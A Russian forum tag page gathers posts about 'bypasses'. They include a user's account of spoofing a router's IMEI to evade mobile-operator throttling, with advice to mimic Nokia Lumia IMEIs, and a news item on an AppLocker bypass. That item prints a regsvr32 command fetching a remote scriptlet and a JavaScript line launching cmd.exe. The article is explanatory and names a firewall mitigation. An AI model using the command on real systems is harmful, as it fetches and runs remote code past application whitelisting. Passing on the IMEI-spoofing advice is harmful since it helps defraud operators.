обход

Постов: 5 Рейтинг: 10977
2546

Жадный опсос, или как я безлимитный интернет раздаю

Развернуть
За месяц до прикрытия безлимитных тарифов для смартфонов и планшетов (год назад дело было) я успел прикупить тариф МожноВсеПланшет от полосатого оператора. И использовал его во всей мере - раздача на пк, на учебе всем одногруппникам, даже роутер для этого дела прикупил, заменив на нем имей (взял от нокии люмии 950xl, чтобы все частоты без проблем подхватывал). В месяц стабильно уходило 200-250гб данных (рекорд - 1300гб в месяц), все фильмы в FullHD, что для моей местности с интернетом от Ростелекома без оптоволокна просто сказка (раньше только HD качество тянуло). Вся эта веселая история продолжалась год.
Вообщем, суть создания поста - две недели терпел медленный интернет на скорости 0.5мбит/с, писал в поддержку, в ответ отмазки - загруженность сети (типично). Никогда такого не было, закралась мысль, что все-таки режут скорость, причем так, что пользоваться инернетом невозможно.
Решил попробовать в других устройствах симкарту, и вуаля, скорость 30мбит/с легко. Ставлю обратно в модем - 0.5мбит/с. Тут задумался, не блокируют ли меня за большой трафик, и написал в поддержку, где ответили что ограничений нет, ну и конечно же, я им не поверил. Посидел, подумал, как меня могут блокировать - только по imei, и решил его сменить (хорошо что остались бэкапы всех программ для роутера, сделал все за 15 минут). После смены протестировал скорость - 32мбит/с с роутера.
Вывод: если вы тоже пользуетесь интернетом как я, и у вас появилась очень низкая скорость - смело меняйте imei, оператор в ограничении скорости не признается.
И кстати, небольшой лайфхак для тех, кто маскирует роутеры для тарифов для смартфонов - ставьте imei от Nokia Lumia (от любой модели с Windows Phone), оператору будет фиолетово, что вы качаете с серверов Microsoft что-либо с пк, и не будет вас блокировать, думая что вы сидите на телефоне с Windows. Год сидел так, все было отлично, даже не фиксировал ttl.
Надеюсь пост будет кому-то полезен.
730

Поднимем флаг!

Развернуть
xxx: Рутрекер снова обошел роскомнадзор! Те попытались заблокировать сервера-анонсеры, но пираты оперативненько написали приложение, которое блокировку обходит. Наш пиратский фрегат теперь пиратская субмарина, с краденными торпедами!
yyy: Правда с поднятием флага будет тяжело.
xxx: Это само собой. Поэтому было решено заменить полный флаг на настольный в каюте капитана.
4068

Если что, то можно и с черного хода.

Развернуть
Если что, то можно и с черного хода.
3262

Тариф "Домашний офис"

Развернуть
Работал я в магазине, расположенном в жилом здании. Понадобился нам по работе интернет, начали искать местного провайдера. А провайдер оказался страсть каким хитрожопым: вместо 500 рублей в месяц за безлимитку на нужной нам скорости предложил платить по 25 000 — дескать, «корпоративное обслуживание», и всё тут. Начальство было уже согласилось, когда мне пришла в голову фееричная идея.


В ближайшем подъезде я нашёл квартиру, снял её за 15 000 в месяц, подключился по домашнему тарифу и кинул витуху от роутера через три этажа вниз до магазина. Счастливы все: я на халяву живу над работой, начальник экономит десятку в месяц, на работе стабильный инет, а провайдер пребывает в святом неведении.
371

Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ

Развернуть
Независимый исследователь Кейси Смит (Casey Smith) обнаружил интересный способ обхода средства безопасности Windows AppLocker. Техника Смита не требует привилегий администратора. Всё, что понадобится для атаки, это лишь короткая команда, код которой уместится даже в один твит.
Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ
Windows AppLocker впервые появился в системах Microsoft с релизом Windows Server 2008 R2 и Windows 7. По сути, эта функция позволяет администратору задавать определенные правила для приложений, определяя, что может и чего не может запустить пользователь (или группа пользователей). К примеру, можно запретить запуск на компьютере любых программ, которые не относятся к рабочей деятельности сотрудника.

Тогда как администраторы привыкли доверять AppLocker, Кейсти Смит пишет, что обойти его ограничения возможно, более того, проделать это весьма легко.

Фактически Смит предложил использовать не по назначению Regsvr32 и с его помощью скачать из интернета определенный файл. Для этого потребуется команда вида:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Исполнение этой команды приведет к скачиваю XML-файла, который приведет к запуску cmd.exe. Кроме того, cmd.exe можно заменить на любую другую программу, и не важно, какие ограничения установлены в AppLocker: программа всё равно успешно запустится.

Как это работает? Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows. Если разбирать команду Смита: /s в коде обязывает Regsvr32 работать тихо, /n приказывает не использовать DllRegisterServer, /u означает, что мы пытаемся осуществить отмену регистрации, а параметр /i отвечает за ссылку и DLLinstall. В свою очередь, scrobj.dll – это Script Component Runtime.

Смит обнаружил, что Regsvr32 обработает URL и доставит на машину заданный файл через HTTP или HTTPS. Исследователь добавил немного JavaScript к своему XML-файлу и инициировал его исполнение через запрос на отмену регистрации .DLL. Таким образом, обход AppLocker становится весьма простым трюком, веь любой пользователь может отправить запрос на отмену регистрации.

Так, в описанном выше примере JavaScript использует ActiveX:

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

Атака Смита не требует привилегий администратора, может быть выдана за обычную сессию HTTP, и не должна оставить ни единого следа на жестком диске жертвы, так как не затрагивает реестр и работает непосредственно с памятью. Никаких патчей на данный момент не существует, разве что Regsvr32 можно отрезать от интернета при помощи файервола.

Исследователь опубликовал на GitHub свой proof-of-concept, который может пригодиться системным администраторам и пентестерам.
Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ
Материалы:
Windows AppLocker 
Кейсти Смит пишет об обходе http://subt0x10. блогспот .ru/2016/04/bypass-application-whitelisting-script.html
Regsvr32 
XML-файл запускающий cmd.exe 
Как параметр /i отвечает за ссылку и DLLinstall 
Proof-of-conceptна исследователя на GitHub 
Пруф